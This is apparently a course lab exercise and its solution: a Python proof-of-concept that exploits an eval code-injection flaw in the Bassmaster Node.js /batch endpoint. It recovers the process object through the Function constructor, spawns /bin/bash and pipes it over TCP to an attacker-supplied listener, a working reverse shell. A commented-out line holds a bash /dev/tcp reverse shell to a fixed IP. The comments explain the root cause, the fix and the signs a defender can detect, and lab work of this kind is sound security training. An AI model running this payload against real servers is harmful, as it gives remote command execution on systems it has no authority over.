7.5
The student user's home directory contains a sub-directory named bassmaster_extramile. In this directory we slightly modified the original Bassmaster code to make exploiting the vulnerability covered in this module harder.
Launch the Node.js batch.js example server from the extra-mile directory and exploit the eval code injection vulnerability, overcoming the new restrictions that are in place.
Solution
- Use `x.constructor.constructor()` to define the `process` module.
- Use `process` to define `require`.
- Construct the reverse shell payload as required.
# Proof-of-concept client for the Bassmaster "/batch" eval code-injection exercise
# (extra-mile variant). Educational framing: the root cause is the server handing
# attacker-controlled text from a batch request's "path" to eval(); the fix is to
# resolve "$n.field" references with a plain property lookup rather than evaluating
# them. From a detection standpoint, the observable behaviour is a Node web server
# spawning /bin/bash through child_process and opening an outbound TCP connection.
# Written for Python 2 (print statement).
import requests,sys
# Exactly three positional arguments: target host, listener IP, listener port.
if len(sys.argv) != 4:
    print "(+) usage: %s <target> <attacking ip address> <attacking port>" % sys.argv[0]
    sys.exit(-1)
# Bassmaster batch endpoint; the port is hard-coded to 8080.
target = "http://%s:8080/batch" % sys.argv[1]
# Command passed to child_process.exec, spelled with "\\x2f" instead of "/": the Python
# literal yields "\\x2f", JSON decoding on the server yields "\x2f", and the JS string
# literal finally yields "/". Presumably this avoids a check on a literal slash in the
# hardened server -- confirm against the extra-mile code.
cmd = "\\\\x2fbin\\\\x2fbash"
attackerip = sys.argv[2]
attackerport = sys.argv[3]
# Two ordinary requests first; the third one references "$1.id" (presumably the id
# taken from request_2's response), which is the expression the server evaluates.
request_1 = '{"method":"get","path":"/profile"}'
request_2 = '{"method":"get","path":"/item"}'
# Payload evaluated by the server. parts.constructor.constructor is the Function
# constructor; a function compiled from a string this way is not bound to the caller's
# restricted scope, so it can hand back the real `process` object, and
# process.mainModule.require then yields a working require().
shell = 'process = parts.constructor.constructor(\'return (function(){return process})()\')(); var require = process.mainModule.require;'
# Start the shell and wire its stdin/stdout/stderr to a TCP socket connected to the
# listener address and port given on the command line.
shell += 'var net = require(\'net\'),sh = require(\'child_process\').exec(\'%s\'); ' % cmd
shell += 'var client = new net.Socket(); '
shell += 'client.connect(%s, \'%s\', function() {client.pipe(sh.stdin);sh.stdout.pipe(client);' % (attackerport, attackerip)
shell += 'sh.stderr.pipe(client);});'
#shell = "parts.constructor.constructor('return child_process')().exec('bash -i >& /dev/tcp/192.168.119.173/4444 0>&1')"
# The ";" terminates the "$1.id" expression so the appended JavaScript runs in the same eval().
request_3 = '{"method":"get","path":"/item/$1.id;%s"}' % shell
# Body is assembled by string formatting rather than json.dumps, so it relies on the
# payload containing no unescaped double quotes (it uses single quotes throughout).
# NOTE: the local name `json` shadows the stdlib module of the same name (not imported here).
json = '{"requests":[%s,%s,%s]}' % (request_1, request_2, request_3)
# Second positional argument of requests.post is the raw request body.
r = requests.post(target, json)
print r.content
